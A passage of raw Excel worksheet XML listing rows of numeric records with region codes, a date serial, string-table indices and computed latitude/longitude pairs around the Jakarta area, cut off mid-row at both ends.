      </c>
      <c r="P1260">
        <v>31</v>
      </c>
      <c r="Q1260" t="s">
        <v>1740</v>
      </c>
      <c r="R1260" t="s">
        <v>1013</v>
      </c>
      <c r="S1260" t="s">
        <v>547</v>
      </c>
      <c r="T1260" t="s">
        <v>33</v>
      </c>
      <c r="U1260" s="5">
        <v>10691239</v>
      </c>
      <c r="V1260" s="5" t="s">
        <v>15621</v>
      </c>
      <c r="W1260" s="5">
        <v>-615812</v>
      </c>
      <c r="X1260" t="s">
        <v>19399</v>
      </c>
      <c r="Y1260" t="str">
        <f t="shared" si="19"/>
        <v>-6.15812,106.91239</v>
      </c>
    </row>
    <row r="1261" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1261">
        <v>108832</v>
      </c>
      <c r="B1261" s="1">
        <v>43885</v>
      </c>
      <c r="C1261">
        <v>1</v>
      </c>
      <c r="D1261" t="s">
        <v>22</v>
      </c>
      <c r="E1261" t="s">
        <v>23</v>
      </c>
      <c r="F1261" t="s">
        <v>4608</v>
      </c>
      <c r="H1261" t="s">
        <v>26</v>
      </c>
      <c r="I1261" t="s">
        <v>3731</v>
      </c>
      <c r="J1261" t="s">
        <v>3009</v>
      </c>
      <c r="L1261" t="s">
        <v>4609</v>
      </c>
      <c r="M1261">
        <v>3174040003</v>
      </c>
      <c r="N1261">
        <v>3174040</v>
      </c>
      <c r="O1261">
        <v>3174</v>
      </c>
      <c r="P1261">
        <v>31</v>
      </c>
      <c r="Q1261" t="s">
        <v>3011</v>
      </c>
      <c r="R1261" t="s">
        <v>377</v>
      </c>
      <c r="S1261" t="s">
        <v>32</v>
      </c>
      <c r="T1261" t="s">
        <v>33</v>
      </c>
      <c r="U1261" s="5">
        <v>10680177</v>
      </c>
      <c r="V1261" s="5" t="s">
        <v>15622</v>
      </c>
      <c r="W1261" s="5">
        <v>-616993</v>
      </c>
      <c r="X1261" t="s">
        <v>19123</v>
      </c>
      <c r="Y1261" t="str">
        <f t="shared" si="19"/>
        <v>-6.16993,106.80177</v>
      </c>
    </row>
    <row r="1262" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1262">
        <v>108833</v>
      </c>
      <c r="B1262" s="1">
        <v>43885</v>
      </c>
      <c r="C1262">
        <v>1</v>
      </c>
      <c r="D1262" t="s">
        <v>22</v>
      </c>
      <c r="E1262" t="s">
        <v>23</v>
      </c>
      <c r="F1262" s="3" t="s">
        <v>4610</v>
      </c>
      <c r="H1262" t="s">
        <v>26</v>
      </c>
      <c r="I1262" t="s">
        <v>2196</v>
      </c>
      <c r="J1262" t="s">
        <v>3229</v>
      </c>
      <c r="L1262" t="s">
        <v>1013</v>
      </c>
      <c r="M1262">
        <v>3175050002</v>
      </c>
      <c r="N1262">
        <v>3175050</v>
      </c>
      <c r="O1262">
        <v>3175</v>
      </c>
      <c r="P1262">
        <v>31</v>
      </c>
      <c r="Q1262" t="s">
        <v>1012</v>
      </c>
      <c r="R1262" t="s">
        <v>1013</v>
      </c>
      <c r="S1262" t="s">
        <v>547</v>
      </c>
      <c r="T1262" t="s">
        <v>33</v>
      </c>
      <c r="U1262" s="5">
        <v>10690309</v>
      </c>
      <c r="V1262" s="5" t="s">
        <v>15623</v>
      </c>
      <c r="W1262" s="5">
        <v>-616895</v>
      </c>
      <c r="X1262" t="s">
        <v>19400</v>
      </c>
      <c r="Y1262" t="str">
        <f t="shared" si="19"/>
        <v>-6.16895,106.90309</v>
      </c>
    </row>
    <row r="1263" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1263">
        <v>108834</v>
      </c>
      <c r="B1263" s="1">
        <v>43885</v>
      </c>
      <c r="C1263">
        <v>1</v>
      </c>
      <c r="D1263" t="s">
        <v>22</v>
      </c>
      <c r="E1263" t="s">
        <v>23</v>
      </c>
      <c r="F1263" t="s">
        <v>4611</v>
      </c>
      <c r="G1263" t="s">
        <v>4612</v>
      </c>
      <c r="H1263" t="s">
        <v>26</v>
      </c>
      <c r="I1263" t="s">
        <v>1201</v>
      </c>
      <c r="J1263" t="s">
        <v>4355</v>
      </c>
      <c r="L1263" t="s">
        <v>4613</v>
      </c>
      <c r="M1263">
        <v>3172080002</v>
      </c>
      <c r="N1263">
        <v>3172080</v>
      </c>
      <c r="O1263">
        <v>3172</v>
      </c>
      <c r="P1263">
        <v>31</v>
      </c>
      <c r="Q1263" t="s">
        <v>2804</v>
      </c>
      <c r="R1263" t="s">
        <v>141</v>
      </c>
      <c r="S1263" t="s">
        <v>49</v>
      </c>
      <c r="T1263" t="s">
        <v>33</v>
      </c>
      <c r="U1263" s="5">
        <v>10693685</v>
      </c>
      <c r="V1263" s="5" t="s">
        <v>15624</v>
      </c>
      <c r="W1263" s="5">
        <v>-620352</v>
      </c>
      <c r="X1263" t="s">
        <v>19401</v>
      </c>
      <c r="Y1263" t="str">
        <f t="shared" si="19"/>
        <v>-6.20352,106.93685</v>
      </c>
    </row>
    <row r="1264" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1264">
        <v>108835</v>
      </c>
      <c r="B1264" s="1">
        <v>43885</v>
      </c>
      <c r="C1264">
        <v>1</v>
      </c>
      <c r="D1264" t="s">
        <v>22</v>
      </c>
      <c r="E1264" t="s">
        <v>23</v>
      </c>
      <c r="F1264" t="s">
        <v>4614</v>
      </c>
      <c r="G1264" t="s">
        <v>4615</v>
      </c>
      <c r="H1264" t="s">
        <v>26</v>
      </c>
      <c r="I1264" t="s">
        <v>517</v>
      </c>
      <c r="J1264" t="s">
        <v>2627</v>
      </c>
      <c r="L1264" t="s">
        <v>4616</v>
      </c>
      <c r="M1264">
        <v>3275061004</v>
      </c>
      <c r="N1264">
        <v>3275061</v>
      </c>
      <c r="O1264">
        <v>3275</v>
      </c>
      <c r="P1264">
        <v>32</v>
      </c>
      <c r="Q1264" t="s">
        <v>39</v>
      </c>
      <c r="R1264" t="s">
        <v>40</v>
      </c>
      <c r="S1264" t="s">
        <v>41</v>
      </c>
      <c r="T1264" t="s">
        <v>42</v>
      </c>
      <c r="U1264" s="5">
        <v>10698917</v>
      </c>
      <c r="V1264" s="5" t="s">
        <v>14937</v>
      </c>
      <c r="W1264" s="5">
        <v>-619035</v>
      </c>
      <c r="X1264" t="s">
        <v>19402</v>
      </c>
      <c r="Y1264" t="str">
        <f t="shared" si="19"/>
        <v>-6.19035,106.98917</v>
      </c>
    </row>
    <row r="1265" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1265">
        <v>108836</v>
      </c>
      <c r="B1265" s="1">
        <v>43885</v>
      </c>
      <c r="C1265">
        <v>1</v>
      </c>
      <c r="D1265" t="s">
        <v>22</v>
      </c>
      <c r="E1265" t="s">
        <v>23</v>
      </c>
      <c r="F1265" t="s">
        <v>4617</v>
      </c>
      <c r="G1265" t="s">
        <v>4618</v>
      </c>
      <c r="H1265" t="s">
        <v>26</v>
      </c>
      <c r="I1265" t="s">
        <v>4619</v>
      </c>
      <c r="J1265" t="s">
        <v>550</v>
      </c>
      <c r="M1265">
        <v>3172040003</v>
      </c>
      <c r="N1265">
        <v>3172040</v>
      </c>
      <c r="O1265">
        <v>3172</v>
      </c>
      <c r="P1265">
        <v>31</v>
      </c>
      <c r="Q1265" t="s">
        <v>552</v>
      </c>
      <c r="R1265" t="s">
        <v>281</v>
      </c>
      <c r="S1265" t="s">
        <v>49</v>
      </c>
      <c r="T1265" t="s">
        <v>33</v>
      </c>
      <c r="U1265" s="5">
        <v>10687824</v>
      </c>
      <c r="V1265" s="5" t="s">
        <v>15625</v>
      </c>
      <c r="W1265" s="5">
        <v>-625230</v>
      </c>
      <c r="X1265" t="s">
        <v>19403</v>
      </c>
      <c r="Y1265" t="str">
        <f t="shared" si="19"/>
        <v>-6.25230,106.87824</v>
      </c>
    </row>
    <row r="1266" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1266">
        <v>108837</v>
      </c>
      <c r="B1266" s="1">
        <v>43885</v>
      </c>
      <c r="C1266">
        <v>1</v>
      </c>
      <c r="D1266" t="s">
        <v>22</v>
      </c>
      <c r="E1266" t="s">
        <v>23</v>
      </c>
      <c r="F1266" t="s">
        <v>4620</v>
      </c>
      <c r="G1266" t="s">
        <v>4621</v>
      </c>
      <c r="H1266" t="s">
        <v>26</v>
      </c>
      <c r="I1266" t="s">
        <v>65</v>
      </c>
      <c r="J1266" t="s">
        <v>2627</v>
      </c>
      <c r="L1266" t="s">
        <v>4622</v>
      </c>
      <c r="M1266">
        <v>3275061004</v>
      </c>
      <c r="N1266">
        <v>3275061</v>
      </c>
      <c r="O1266">
        <v>3275</v>
      </c>
      <c r="P1266">
        <v>32</v>
      </c>
      <c r="Q1266" t="s">
        <v>39</v>
      </c>
      <c r="R1266" t="s">
        <v>40</v>
      </c>
      <c r="S1266" t="s">
        <v>41</v>
      </c>
      <c r="T1266" t="s">
        <v>42</v>
      </c>
      <c r="U1266" s="5">
        <v>10698986</v>
      </c>
      <c r="V1266" s="5" t="s">
        <v>15626</v>
      </c>
      <c r="W1266" s="5">
        <v>-617265</v>
      </c>
      <c r="X1266" t="s">
        <v>19404</v>
      </c>
      <c r="Y1266" t="str">
        <f t="shared" si="19"/>
        <v>-6.17265,106.98986</v>
      </c>
    </row>
    <row r="1267" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1267">
        <v>108838</v>
      </c>
      <c r="B1267" s="1">
        <v>43885</v>
      </c>
      <c r="C1267">
        <v>1</v>
      </c>
      <c r="D1267" t="s">
        <v>22</v>
      </c>
      <c r="E1267" t="s">
        <v>23</v>
      </c>
      <c r="F1267" t="s">
        <v>4623</v>
      </c>
      <c r="G1267" t="s">
        <v>4624</v>
      </c>
      <c r="H1267" t="s">
        <v>26</v>
      </c>
      <c r="I1267" t="s">
        <v>3407</v>
      </c>
      <c r="J1267" t="s">
        <v>4625</v>
      </c>
      <c r="L1267" t="s">
        <v>4626</v>
      </c>
      <c r="M1267">
        <v>3173060006</v>
      </c>
      <c r="N1267">
        <v>3173060</v>
      </c>
      <c r="O1267">
        <v>3173</v>
      </c>
      <c r="P1267">
        <v>31</v>
      </c>
      <c r="Q1267" t="s">
        <v>1587</v>
      </c>
      <c r="R1267" t="s">
        <v>61</v>
      </c>
      <c r="S1267" t="s">
        <v>62</v>
      </c>
      <c r="T1267" t="s">
        <v>33</v>
      </c>
      <c r="U1267" s="5">
        <v>10685528</v>
      </c>
      <c r="V1267" s="5" t="s">
        <v>15627</v>
      </c>
      <c r="W1267" s="5">
        <v>-615478</v>
      </c>
      <c r="X1267" t="s">
        <v>19405</v>
      </c>
      <c r="Y1267" t="str">
        <f t="shared" si="19"/>
        <v>-6.15478,106.85528</v>
      </c>
    </row>
    <row r="1268" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1268">
        <v>108839</v>
      </c>
      <c r="B1268" s="1">
        <v>43885</v>
      </c>
      <c r="C1268">
        <v>1</v>
      </c>
      <c r="D1268" t="s">
        <v>22</v>
      </c>
      <c r="E1268" t="s">
        <v>23</v>
      </c>
      <c r="F1268" t="s">
        <v>4627</v>
      </c>
      <c r="H1268" t="s">
        <v>26</v>
      </c>
      <c r="I1268" t="s">
        <v>1595</v>
      </c>
      <c r="J1268" t="s">
        <v>2434</v>
      </c>
      <c r="L1268" t="s">
        <v>4628</v>
      </c>
      <c r="M1268">
        <v>3172080001</v>
      </c>
      <c r="N1268">
        <v>3172080</v>
      </c>
      <c r="O1268">
        <v>3172</v>
      </c>
      <c r="P1268">
        <v>31</v>
      </c>
      <c r="Q1268" t="s">
        <v>48</v>
      </c>
      <c r="R1268" t="s">
        <v>141</v>
      </c>
      <c r="S1268" t="s">
        <v>49</v>
      </c>
      <c r="T1268" t="s">
        <v>33</v>
      </c>
      <c r="U1268" s="5">
        <v>10690601</v>
      </c>
      <c r="V1268" s="5" t="s">
        <v>15628</v>
      </c>
      <c r="W1268" s="5">
        <v>-619218</v>
      </c>
      <c r="X1268" t="s">
        <v>19406</v>
      </c>
      <c r="Y1268" t="str">
        <f t="shared" si="19"/>
        <v>-6.19218,106.90601</v>
      </c>
    </row>
    <row r="1269" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1269">
        <v>108840</v>
      </c>
      <c r="B1269" s="1">
        <v>43885</v>
      </c>
      <c r="C1269">
        <v>1</v>
      </c>
      <c r="D1269" t="s">
        <v>22</v>
      </c>
      <c r="E1269" t="s">
        <v>23</v>
      </c>
      <c r="F1269" t="s">
        <v>4629</v>
      </c>
      <c r="H1269" t="s">
        <v>26</v>
      </c>
      <c r="I1269" t="s">
        <v>1689</v>
      </c>
      <c r="J1269" t="s">
        <v>4630</v>
      </c>
      <c r="L1269" t="s">
        <v>4631</v>
      </c>
      <c r="M1269">
        <v>3172100001</v>
      </c>
      <c r="N1269">
        <v>3172100</v>
      </c>
      <c r="O1269">
        <v>3172</v>
      </c>
      <c r="P1269">
        <v>31</v>
      </c>
      <c r="Q1269" t="s">
        <v>3253</v>
      </c>
      <c r="R1269" t="s">
        <v>1436</v>
      </c>
      <c r="S1269" t="s">
        <v>49</v>
      </c>
      <c r="T1269" t="s">
        <v>33</v>
      </c>
      <c r="U1269" s="5">
        <v>10685354</v>
      </c>
      <c r="V1269" s="5" t="s">
        <v>15629</v>
      </c>
      <c r="W1269" s="5">
        <v>-619997</v>
      </c>
      <c r="X1269" t="s">
        <v>18435</v>
      </c>
      <c r="Y1269" t="str">
        <f t="shared" si="19"/>
        <v>-6.19997,106.85354</v>
      </c>
    </row>
    <row r="1270" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1270">
        <v>108841</v>
      </c>
      <c r="B1270" s="1">
        <v>43885</v>
      </c>
      <c r="C1270">
        <v>1</v>
      </c>
      <c r="D1270" t="s">
        <v>22</v>
      </c>
      <c r="E1270" t="s">
        <v>23</v>
      </c>
      <c r="F1270" t="s">
        <v>4632</v>
      </c>
      <c r="G1270" t="s">
        <v>4633</v>
      </c>
      <c r="H1270" t="s">
        <v>26</v>
      </c>
      <c r="I1270" t="s">
        <v>1633</v>
      </c>
      <c r="J1270" t="s">
        <v>2627</v>
      </c>
      <c r="L1270" t="s">
        <v>4634</v>
      </c>
      <c r="M1270">
        <v>3275050003</v>
      </c>
      <c r="N1270">
        <v>3275050</v>
      </c>
      <c r="O1270">
        <v>3275</v>
      </c>
      <c r="P1270">
        <v>32</v>
      </c>
      <c r="Q1270" t="s">
        <v>2310</v>
      </c>
      <c r="R1270" t="s">
        <v>955</v>
      </c>
      <c r="S1270" t="s">
        <v>41</v>
      </c>
      <c r="T1270" t="s">
        <v>42</v>
      </c>
      <c r="U1270" s="5">
        <v>10698259</v>
      </c>
      <c r="V1270" s="5" t="s">
        <v>15630</v>
      </c>
      <c r="W1270" s="5">
        <v>-624966</v>
      </c>
      <c r="X1270" t="s">
        <v>19407</v>
      </c>
      <c r="Y1270" t="str">
        <f t="shared" si="19"/>
        <v>-6.24966,106.98259</v>
      </c>
    </row>
    <row r="1271" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1271">
        <v>108842</v>
      </c>
      <c r="B1271" s="1">
        <v>43885</v>
      </c>
      <c r="C1271">
        <v>1</v>
      </c>
      <c r="D1271" t="s">
        <v>22</v>
      </c>
      <c r="E1271" t="s">
        <v>23</v>
      </c>
      <c r="F1271" t="s">
        <v>4635</v>
      </c>
      <c r="H1271" t="s">
        <v>26</v>
      </c>
      <c r="I1271" t="s">
        <v>457</v>
      </c>
      <c r="J1271" t="s">
        <v>2627</v>
      </c>
      <c r="L1271" t="s">
        <v>4636</v>
      </c>
      <c r="M1271">
        <v>3275010010</v>
      </c>
      <c r="N1271">
        <v>3275010</v>
      </c>
      <c r="O1271">
        <v>3275</v>
      </c>
      <c r="P1271">
        <v>32</v>
      </c>
      <c r="Q1271" t="s">
        <v>286</v>
      </c>
      <c r="R1271" t="s">
        <v>287</v>
      </c>
      <c r="S1271" t="s">
        <v>41</v>
      </c>
      <c r="T1271" t="s">
        <v>42</v>
      </c>
      <c r="U1271" s="5">
        <v>10694965</v>
      </c>
      <c r="V1271" s="5" t="s">
        <v>15631</v>
      </c>
      <c r="W1271" s="5">
        <v>-625878</v>
      </c>
      <c r="X1271" t="s">
        <v>19408</v>
      </c>
      <c r="Y1271" t="str">
        <f t="shared" si="19"/>
        <v>-6.25878,106.94965</v>
      </c>
    </row>
    <row r="1272" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1272">
        <v>108843</v>
      </c>
      <c r="B1272" s="1">
        <v>43885</v>
      </c>
      <c r="C1272">
        <v>1</v>
      </c>
      <c r="D1272" t="s">
        <v>22</v>
      </c>
      <c r="E1272" t="s">
        <v>23</v>
      </c>
      <c r="F1272" t="s">
        <v>4637</v>
      </c>
      <c r="G1272" t="s">
        <v>4638</v>
      </c>
      <c r="H1272" t="s">
        <v>26</v>
      </c>
      <c r="I1272" t="s">
        <v>2016</v>
      </c>
      <c r="J1272" t="s">
        <v>4639</v>
      </c>
      <c r="M1272">
        <v>3174050006</v>
      </c>
      <c r="N1272">
        <v>3174050</v>
      </c>
      <c r="O1272">
        <v>3174</v>
      </c>
      <c r="P1272">
        <v>31</v>
      </c>
      <c r="Q1272" t="s">
        <v>4640</v>
      </c>
      <c r="R1272" t="s">
        <v>2826</v>
      </c>
      <c r="S1272" t="s">
        <v>32</v>
      </c>
      <c r="T1272" t="s">
        <v>33</v>
      </c>
      <c r="U1272" s="5">
        <v>10680057</v>
      </c>
      <c r="V1272" s="5" t="s">
        <v>15632</v>
      </c>
      <c r="W1272" s="5">
        <v>-614886</v>
      </c>
      <c r="X1272" t="s">
        <v>19409</v>
      </c>
      <c r="Y1272" t="str">
        <f t="shared" si="19"/>
        <v>-6.14886,106.80057</v>
      </c>
    </row>
    <row r="1273" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1273">
        <v>108844</v>
      </c>
      <c r="B1273" s="1">
        <v>43885</v>
      </c>
      <c r="C1273">
        <v>1</v>
      </c>
      <c r="D1273" t="s">
        <v>22</v>
      </c>
      <c r="E1273" t="s">
        <v>23</v>
      </c>
      <c r="F1273" t="s">
        <v>4641</v>
      </c>
      <c r="G1273" t="s">
        <v>4642</v>
      </c>
      <c r="H1273" t="s">
        <v>26</v>
      </c>
      <c r="I1273" t="s">
        <v>534</v>
      </c>
      <c r="J1273" t="s">
        <v>2627</v>
      </c>
      <c r="M1273">
        <v>3216081001</v>
      </c>
      <c r="N1273">
        <v>3216081</v>
      </c>
      <c r="O1273">
        <v>3216</v>
      </c>
      <c r="P1273">
        <v>32</v>
      </c>
      <c r="Q1273" t="s">
        <v>1726</v>
      </c>
      <c r="R1273" t="s">
        <v>2512</v>
      </c>
      <c r="S1273" t="s">
        <v>41</v>
      </c>
      <c r="T1273" t="s">
        <v>42</v>
      </c>
      <c r="U1273" s="5">
        <v>10702727</v>
      </c>
      <c r="V1273" s="5" t="s">
        <v>15633</v>
      </c>
      <c r="W1273" s="5">
        <v>-627775</v>
      </c>
      <c r="X1273" t="s">
        <v>19410</v>
      </c>
      <c r="Y1273" t="str">
        <f t="shared" si="19"/>
        <v>-6.27775,107.02727</v>
      </c>
    </row>
    <row r="1274" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1274">
        <v>108845</v>
      </c>
      <c r="B1274" s="1">
        <v>43885</v>
      </c>
      <c r="C1274">
        <v>1</v>
      </c>
      <c r="D1274" t="s">
        <v>22</v>
      </c>
      <c r="E1274" t="s">
        <v>23</v>
      </c>
      <c r="F1274" t="s">
        <v>4643</v>
      </c>
      <c r="H1274" t="s">
        <v>26</v>
      </c>
      <c r="I1274" t="s">
        <v>2962</v>
      </c>
      <c r="J1274" t="s">
        <v>2627</v>
      </c>
      <c r="L1274" t="s">
        <v>4644</v>
      </c>
      <c r="M1274">
        <v>3275050002</v>
      </c>
      <c r="N1274">
        <v>3275050</v>
      </c>
      <c r="O1274">
        <v>3275</v>
      </c>
      <c r="P1274">
        <v>32</v>
      </c>
      <c r="Q1274" t="s">
        <v>2245</v>
      </c>
      <c r="R1274" t="s">
        <v>955</v>
      </c>
      <c r="S1274" t="s">
        <v>41</v>
      </c>
      <c r="T1274" t="s">
        <v>42</v>
      </c>
      <c r="U1274" s="5">
        <v>10697084</v>
      </c>
      <c r="V1274" s="5" t="s">
        <v>15634</v>
      </c>
      <c r="W1274" s="5">
        <v>-626198</v>
      </c>
      <c r="X1274" t="s">
        <v>19342</v>
      </c>
      <c r="Y1274" t="str">
        <f t="shared" si="19"/>
        <v>-6.26198,106.97084</v>
      </c>
    </row>
    <row r="1275" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1275">
        <v>108846</v>
      </c>
      <c r="B1275" s="1">
        <v>43885</v>
      </c>
      <c r="C1275">
        <v>1</v>
      </c>
      <c r="D1275" t="s">
        <v>22</v>
      </c>
      <c r="E1275" t="s">
        <v>23</v>
      </c>
      <c r="F1275" t="s">
        <v>4645</v>
      </c>
      <c r="H1275" t="s">
        <v>26</v>
      </c>
      <c r="I1275" t="s">
        <v>2562</v>
      </c>
      <c r="J1275" t="s">
        <v>2248</v>
      </c>
      <c r="L1275" t="s">
        <v>4646</v>
      </c>
      <c r="M1275">
        <v>3172080003</v>
      </c>
      <c r="N1275">
        <v>3172080</v>
      </c>
      <c r="O1275">
        <v>3172</v>
      </c>
      <c r="P1275">
        <v>31</v>
      </c>
      <c r="Q1275" t="s">
        <v>2250</v>
      </c>
      <c r="R1275" t="s">
        <v>141</v>
      </c>
      <c r="S1275" t="s">
        <v>49</v>
      </c>
      <c r="T1275" t="s">
        <v>33</v>
      </c>
      <c r="U1275" s="5">
        <v>10694980</v>
      </c>
      <c r="V1275" s="5" t="s">
        <v>15635</v>
      </c>
      <c r="W1275" s="5">
        <v>-620650</v>
      </c>
      <c r="X1275" t="s">
        <v>19411</v>
      </c>
      <c r="Y1275" t="str">
        <f t="shared" si="19"/>
        <v>-6.20650,106.94980</v>
      </c>
    </row>
    <row r="1276" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1276">
        <v>108847</v>
      </c>
      <c r="B1276" s="1">
        <v>43885</v>
      </c>
      <c r="C1276">
        <v>1</v>
      </c>
      <c r="D1276" t="s">
        <v>22</v>
      </c>
      <c r="E1276" t="s">
        <v>23</v>
      </c>
      <c r="F1276" t="s">
        <v>4647</v>
      </c>
      <c r="G1276" t="s">
        <v>4648</v>
      </c>
      <c r="H1276" t="s">
        <v>26</v>
      </c>
      <c r="I1276" t="s">
        <v>492</v>
      </c>
      <c r="J1276" t="s">
        <v>4437</v>
      </c>
      <c r="L1276" t="s">
        <v>4649</v>
      </c>
      <c r="M1276">
        <v>3172090005</v>
      </c>
      <c r="N1276">
        <v>3172090</v>
      </c>
      <c r="O1276">
        <v>3172</v>
      </c>
      <c r="P1276">
        <v>31</v>
      </c>
      <c r="Q1276" t="s">
        <v>2749</v>
      </c>
      <c r="R1276" t="s">
        <v>890</v>
      </c>
      <c r="S1276" t="s">
        <v>49</v>
      </c>
      <c r="T1276" t="s">
        <v>33</v>
      </c>
      <c r="U1276" s="5">
        <v>10689093</v>
      </c>
      <c r="V1276" s="5" t="s">
        <v>15636</v>
      </c>
      <c r="W1276" s="5">
        <v>-618892</v>
      </c>
      <c r="X1276" t="s">
        <v>19412</v>
      </c>
      <c r="Y1276" t="str">
        <f t="shared" si="19"/>
        <v>-6.18892,106.89093</v>
      </c>
    </row>
    <row r="1277" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1277">
        <v>108849</v>
      </c>
      <c r="B1277" s="1">
        <v>43885</v>
      </c>
      <c r="C1277">
        <v>1</v>
      </c>
      <c r="D1277" t="s">
        <v>22</v>
      </c>
      <c r="E1277" t="s">
        <v>23</v>
      </c>
      <c r="F1277" t="s">
        <v>4650</v>
      </c>
      <c r="G1277" t="s">
        <v>4651</v>
      </c>
      <c r="H1277" t="s">
        <v>26</v>
      </c>
      <c r="I1277" t="s">
        <v>722</v>
      </c>
      <c r="J1277" t="s">
        <v>4119</v>
      </c>
      <c r="L1277" t="s">
        <v>4652</v>
      </c>
      <c r="M1277">
        <v>3172080001</v>
      </c>
      <c r="N1277">
        <v>3172080</v>
      </c>
      <c r="O1277">
        <v>3172</v>
      </c>
      <c r="P1277">
        <v>31</v>
      </c>
      <c r="Q1277" t="s">
        <v>48</v>
      </c>
      <c r="R1277" t="s">
        <v>141</v>
      </c>
      <c r="S1277" t="s">
        <v>49</v>
      </c>
      <c r="T1277" t="s">
        <v>33</v>
      </c>
      <c r="U1277" s="5">
        <v>10691095</v>
      </c>
      <c r="V1277" s="5" t="s">
        <v>15637</v>
      </c>
      <c r="W1277" s="5">
        <v>-621296</v>
      </c>
      <c r="X1277" t="s">
        <v>19413</v>
      </c>
      <c r="Y1277" t="str">
        <f t="shared" si="19"/>
        <v>-6.21296,106.91095</v>
      </c>
    </row>
    <row r="1278" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1278">
        <v>108850</v>
      </c>
      <c r="B1278" s="1">
        <v>43885</v>
      </c>
      <c r="C1278">
        <v>1</v>
      </c>
      <c r="D1278" t="s">
        <v>22</v>
      </c>
      <c r="E1278" t="s">
        <v>23</v>
      </c>
      <c r="F1278" t="s">
        <v>4653</v>
      </c>
      <c r="G1278" t="s">
        <v>4654</v>
      </c>
      <c r="H1278" t="s">
        <v>26</v>
      </c>
      <c r="I1278" t="s">
        <v>2139</v>
      </c>
      <c r="J1278" t="s">
        <v>3135</v>
      </c>
      <c r="L1278" t="s">
        <v>4655</v>
      </c>
      <c r="M1278">
        <v>3671010001</v>
      </c>
      <c r="N1278">
        <v>3671010</v>
      </c>
      <c r="O1278">
        <v>3671</v>
      </c>
      <c r="P1278">
        <v>36</v>
      </c>
      <c r="Q1278" t="s">
        <v>4656</v>
      </c>
      <c r="R1278" t="s">
        <v>200</v>
      </c>
      <c r="S1278" t="s">
        <v>201</v>
      </c>
      <c r="T1278" t="s">
        <v>171</v>
      </c>
      <c r="U1278" s="5">
        <v>10668913</v>
      </c>
      <c r="V1278" s="5" t="s">
        <v>15638</v>
      </c>
      <c r="W1278" s="5">
        <v>-623668</v>
      </c>
      <c r="X1278" t="s">
        <v>19414</v>
      </c>
      <c r="Y1278" t="str">
        <f t="shared" si="19"/>
        <v>-6.23668,106.68913</v>
      </c>
    </row>
    <row r="1279" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1279">
        <v>108851</v>
      </c>
      <c r="B1279" s="1">
        <v>43885</v>
      </c>
      <c r="C1279">
        <v>1</v>
      </c>
      <c r="D1279" t="s">
        <v>22</v>
      </c>
      <c r="E1279" t="s">
        <v>23</v>
      </c>
      <c r="F1279" t="s">
        <v>4657</v>
      </c>
      <c r="H1279" t="s">
        <v>26</v>
      </c>
      <c r="I1279" t="s">
        <v>383</v>
      </c>
      <c r="J1279" t="s">
        <v>4658</v>
      </c>
      <c r="L1279" t="s">
        <v>4659</v>
      </c>
      <c r="M1279">
        <v>3172030005</v>
      </c>
      <c r="N1279">
        <v>3172030</v>
      </c>
      <c r="O1279">
        <v>3172</v>
      </c>
      <c r="P1279">
        <v>31</v>
      </c>
      <c r="Q1279" t="s">
        <v>1256</v>
      </c>
      <c r="R1279" t="s">
        <v>228</v>
      </c>
      <c r="S1279" t="s">
        <v>49</v>
      </c>
      <c r="T1279" t="s">
        <v>33</v>
      </c>
      <c r="U1279" s="5">
        <v>10691471</v>
      </c>
      <c r="V1279" s="5" t="s">
        <v>15639</v>
      </c>
      <c r="W1279" s="5">
        <v>-631721</v>
      </c>
      <c r="X1279" t="s">
        <v>19415</v>
      </c>
      <c r="Y1279" t="str">
        <f t="shared" si="19"/>
        <v>-6.31721,106.91471</v>
      </c>
    </row>
    <row r="1280" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1280">
        <v>108852</v>
      </c>
      <c r="B1280" s="1">
        <v>43885</v>
      </c>
      <c r="C1280">
        <v>1</v>
      </c>
      <c r="D1280" t="s">
        <v>22</v>
      </c>
      <c r="E1280" t="s">
        <v>23</v>
      </c>
      <c r="F1280" t="s">
        <v>4660</v>
      </c>
      <c r="G1280" t="s">
        <v>4661</v>
      </c>
      <c r="H1280" t="s">
        <v>26</v>
      </c>
      <c r="I1280" t="s">
        <v>2165</v>
      </c>
      <c r="J1280" t="s">
        <v>3045</v>
      </c>
      <c r="M1280">
        <v>3175060002</v>
      </c>
      <c r="N1280">
        <v>3175060</v>
      </c>
      <c r="O1280">
        <v>3175</v>
      </c>
      <c r="P1280">
        <v>31</v>
      </c>
      <c r="Q1280" t="s">
        <v>2674</v>
      </c>
      <c r="R1280" t="s">
        <v>2279</v>
      </c>
      <c r="S1280" t="s">
        <v>547</v>
      </c>
      <c r="T1280" t="s">
        <v>33</v>
      </c>
      <c r="U1280" s="5">
        <v>10695079</v>
      </c>
      <c r="V1280" s="5" t="s">
        <v>15640</v>
      </c>
      <c r="W1280" s="5">
        <v>-614230</v>
      </c>
      <c r="X1280" t="s">
        <v>19416</v>
      </c>
      <c r="Y1280" t="str">
        <f t="shared" si="19"/>
        <v>-6.14230,106.95079</v>
      </c>
    </row>
    <row r="1281" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1281">
        <v>108853</v>
      </c>
      <c r="B1281" s="1">
        <v>43885</v>
      </c>
      <c r="C1281">
        <v>1</v>
      </c>
      <c r="D1281" t="s">
        <v>22</v>
      </c>
      <c r="E1281" t="s">
        <v>23</v>
      </c>
      <c r="F1281" t="s">
        <v>4662</v>
      </c>
      <c r="G1281" t="s">
        <v>4663</v>
      </c>
      <c r="H1281" t="s">
        <v>26</v>
      </c>
      <c r="I1281" t="s">
        <v>487</v>
      </c>
      <c r="J1281" t="s">
        <v>232</v>
      </c>
      <c r="L1281" t="s">
        <v>4664</v>
      </c>
      <c r="M1281">
